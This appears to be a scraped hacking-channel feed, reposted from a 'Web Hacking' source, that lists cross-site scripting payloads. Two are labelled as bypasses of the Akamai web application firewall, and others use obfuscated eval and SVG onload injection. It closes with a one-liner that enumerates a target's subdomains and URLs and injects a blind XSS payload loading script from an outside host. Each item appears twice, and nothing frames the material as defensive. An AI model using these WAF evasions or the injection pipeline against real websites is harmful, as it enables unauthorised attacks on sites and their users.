π₯OSCP Trainingπ₯π‘βοΈπ¨π»βπ» pinned Β«https://tttttt.me/bug_bounty_bootcampΒ»
Forwarded from Web Hacking
Akamai WAF bypass
<A href="javascrip%09t:eval.apply`${[jj.className+`(23)`]}`" id=jj class=alert>Click Here
<A href="javascrip%09t:eval.apply`${[jj.className+`(23)`]}`" id=jj class=alert>Click Here
Forwarded from Web Hacking
A nice way to store the payload
"><script>eval(new URL(document.location.href+"#javascript:confirm(69)").hash.slice(1))</script>
"><script>eval(new URL(document.location.href+"#javascript:confirm(69)").hash.slice(1))</script>
Forwarded from Web Hacking
A payload to bypass Akamai WAF
<A href="javascrip%09t:eval.apply`${[jj.className+`(23)`]}`" id=jj class=alert>Click Here
<A href="javascrip%09t:eval.apply`${[jj.className+`(23)`]}`" id=jj class=alert>Click Here
Forwarded from Web Hacking
Another one
"><img/src/style=html:url("data:,"><svg/onload=confirm(69)>")>
"><img/src/style=html:url("data:,"><svg/onload=confirm(69)>")>
One Liner To Find Blind XSS
Blind XSS in Parameters
subfinder -d target.com | gau | grep "&" | bxss -appendMode -payload '"><script src=hacker.xss.ht></script>' -parameters
Blind XSS in Parameters
subfinder -d target.com | gau | grep "&" | bxss -appendMode -payload '"><script src=hacker.xss.ht></script>' -parameters